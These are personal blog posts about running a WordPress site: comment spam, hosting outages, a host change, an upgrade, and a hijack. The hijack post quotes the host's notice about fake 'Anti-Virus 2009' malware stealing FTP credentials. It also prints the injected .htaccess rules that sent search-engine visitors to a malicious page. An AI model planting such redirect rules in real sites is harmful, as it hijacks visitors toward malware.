Category: This Blog

Comment spam seems to be on the rise. So much so that my hosting service completely removed this site to avoid hurting other shared hosting instances.

I was forced to disable comments on posts older than 30 days and on the 2 pages in this blog. It’s a shame, but I wanted the blog to be back up.

To avoid comment spam I’ve previously disallowed anonymous comments on this blog. I would like to see if allowing anonymous comments can work without this blog filling up with huge amounts of spam.

I still prefer that users register and comment, but now you can just blurt out whatever it is on your mind without revealing who you are.

Yesterday the blog went offline for about 12 hours. It started with an “Internal Server Error” around 11am Israel time. I was about to comment on one of my posts when it happened, immediately opened a ticket with DreamHost’s ticket system and was happy to see it being treated promptly – it moved from “unverified” to “verified” to “resolved.”

But the issue was not resolved – the website was still down so I opened another ticket, this time telling them that it’s not OK to set the status of a ticket to “resolved” if the website is still down. What I got in return were offers on how to improve the speed of my blog. Considering that it serves 7 readers, I told them this could hardly be the reason. And I haven’t changed the code in a while, so it’s not supposed to break just like that. I still tried what they offered (disabling WordPress plugins) which of course didn’t help.

So I replied to their email and after 12 hours someone at DreamHost’s support (thanks, Jason) decided to actually look into the issue, agreed with me that the problem was on their end and fixed it.

I hope it’s a one time thing and not an indication of things to come. It’s a real hassle to switch hosts and I wouldn’t want to do it again.

Over the weekend I moved this blog to DreamHost. They have a deal where you pay less than 10 USD for the first year of hosting and they seem pretty decent. My previous host, IX Web Hosting, really sucked and the blog was hijacked thanks to their stupidity, even during my trip. I hope that I won’t have to worry about stuff like that anymore.

Just a quick note… also, if you know how to make an updated post re-appear on the RSS feed, please let me know.

Yesterday my brother called me up to let me know that when clicking a link in Google Reader to get to this blog, a malicious website appears instead of the blog. I tried it myself and he was right. The strange thing was that if you tried to enter the address yourself it worked but only if you clicked a link inside Google Reader you would get to the malicious website.

I tried looking for what could have gone wrong. As I couldn’t find anything, I assumed maybe some kind of DNS poisoning occurred, that the solution is out of my reach and that if I wait it out a little bit everything will be back to normal.

So today I checked again and the problem still persisted. I decided to look further into things. Remembering an email message I got from my host, IX Web Hosting, I looked it up. Here it is:

Dear Amit,

In our ongoing commitment to the security of our customers, we have discovered a vulnerability located within many of our client’s websites, including yours. This is a self replicating virus which is found by visiting well-known search engines. When you click on any link it may redirect you to a fake Anti-Virus 2009 website which appears to scan your system and then asks you to download the software. Once downloaded and installed it begins displaying pop ups on your desktop. At this time it collects your FTP user name and password from your own computer and uses that information to upload an exploited file named “.htaccess” to your website. Any visitors to your website will then be redirected to the fake anti-virus website.

We have dedicated our systems administration team to finding a solution to this and are happy to say that as one of the first hosting companies we have successfully cleaned all instances of this virus from our servers more than a week ago, and are continually scanning them to ensure your site does not become re-infected.

While your website is now secure, your computer may still be at risk. Here are two easy steps that will detect and remove this malicious software from your computer and make sure your website will not spread the virus again:

1. Uninstall the fake Anti-Virus software by following the instructions at this link:
http://www.bleepingcomputer.com/malware-removal/uninstall-antivirus-2009

2. Once removed, change your FTP password from within your web hosting control panel. Once logged in, click on the FTP Manager icon and then on the icon next to the password to change it.

To illustrate the severity of the issue I would like to share some facts with you:

* 26,991 of our customers have been infected with fake Anti-Virus 2009
* 79,469 websites have been spreading the Anti-Virus 2009 infection
* 120,923 malicious files have been removed from our system

We are constantly monitoring our servers for potential threats to your website, and are proud to say that we are among the first web hosts to identify this particular problem, and have been the first to offer a resolution. Your continued and safe presence on the internet is our top priority.

If you have questions regarding any of this information, please contact our support team anytime.

Kind Regards,

Fatima Said, CCO
IX Web Hosting
http://www.ixwebhosting.com

When I first got this message I thought it was a hoax. Considering that the computers I use to access my website all have Linux installed, “blaming” me for having the infamous Anti-Virus 2009 (which is a relatively new and very aggressive virus) on my computers is simply wrong, being impossible and all. So I ignored the message but still kept it (I thought about contacting IX Web Hosting to ask whether this was real but just forgot about it.)

Reading the message from IX Web Hosting again, though, got me to check my .htaccess file. And indeed the file contained the following lines:

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*oogle.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ahoo.*$ [NC]
RewriteRule .* http://10.0.0.1/join.html?s=join [R,L]

These lines mean that if you get to this website from any of the well-known search engines you will be redirected to the address at the last line (I changed the IP address intentionally.) Once I deleted the file from the website’s root directory everything was back to normal. Now I wanted to know how long my blog had been hijacked. My Google Analytics account revealed the answer: my search engines sources dropped to almost zero around December 14th (about a month ago.)

Digging further, I found this post on the IX Web Hosting Warning blog. The writer of the post seems to think, like me, that IX Web Hosting are simply trying to shift the blame to the customers, which is a big shame.

Up until today I was generally happy with IX Web Hosting. I almost never had any problems with the website and whenever I needed support they answered quickly and resolved any issues I had. But reading through the IX Web Hosting Warning blog made me want to switch hosts (again.) I guess I’ll do that when I’m back from my trip and hope for the best until then. I just can’t be bothered right now with switching hosts.

Finally I took the time and courage to update my blog’s software. It is now running WordPress 2.6.3, the latest and greatest from the good people at WordPress.org. To upgrade the blog I first had to convert the database to a utf8_unicode_ci collation. It was already Unicode, but the collation wasn’t set right. That was frightening stuff by itself, since these kind of changes can convert all my Hebrew posts to common Gibberish. Naturally I tested this on my home copy of the blog and had everything backed up beforehand, but still…

The upgrade process went very smoothly and lasted for about 15 minutes (I doubt any of the 6 readers of this blog saw the “I’m upgrading” message I put on the front page). I chose the extended upgrade instructions which include the scary step of deleting almost everything from the server. But it’s the cleaner way to go. I was pleasantly surprised to learn the WordPress now supports “Unicode connections” (or whatever the formal name is) to the database so I don’t need to hack the wp-db.php file like I used to before following upgrades.

The reason for the upgrade is my upcoming trip. I would like to use the blog to post updates and pictures from the trip. I still need to choose a solution for posting pictures. There are many to choose from.

Hebrew is still aligned to the left. I’ll get to that soon. Now… let’s see if this post goes through :)